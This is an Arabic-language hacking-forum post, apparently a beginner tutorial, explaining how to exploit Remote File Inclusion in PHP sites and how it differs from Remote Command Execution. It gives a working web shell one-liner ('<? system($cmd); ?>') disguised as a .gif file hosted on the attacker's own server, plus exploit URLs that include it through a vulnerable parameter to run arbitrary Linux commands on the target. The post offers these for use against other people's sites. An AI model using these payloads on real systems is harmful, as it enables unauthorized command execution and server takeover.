السلام عليكم نيجي للشرح @@@@@@@@@ ثغرات File Inclusion ============================== ===== الثغرات المسماه Remote File Inclusion شبيهه بعمل Remote Command Execution لكن الفرق يلزم كود لرفعه لموقعك ومن ثم تأخذ رابطه وتستخدمه للاستغلال مثال الاستغلال : http://www******.net/index.php?mode=http://site?&cmd http://site = موقعك ?&cmd = كود مرفوع بموقعك افتح النوت باد Notepad وادخل هذا الكود واحفظها باسم cmd.gif كود: <? system($cmd); ?> */ وعند الاستغلال http://www.*******.net/index.php?mod...md.gif?&cmd=id ... أن Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الأوامر مكان الآي دي id ((رابط موقعك مع الـ id )) و Remote Command Execution تستخدم أوامر اللينكس على مباشرة بدون كود مرفوع (( الـ idفقط )) انشالله يكون الشرح بسيط ومفهوم
دورة الفايروسات الدرس الاول من هنا الدرس الثاني من هنا الدرس الثالث الدرس الرابع + كشف التلغيم الدرس الخامس facebook
قوانين المنتدى
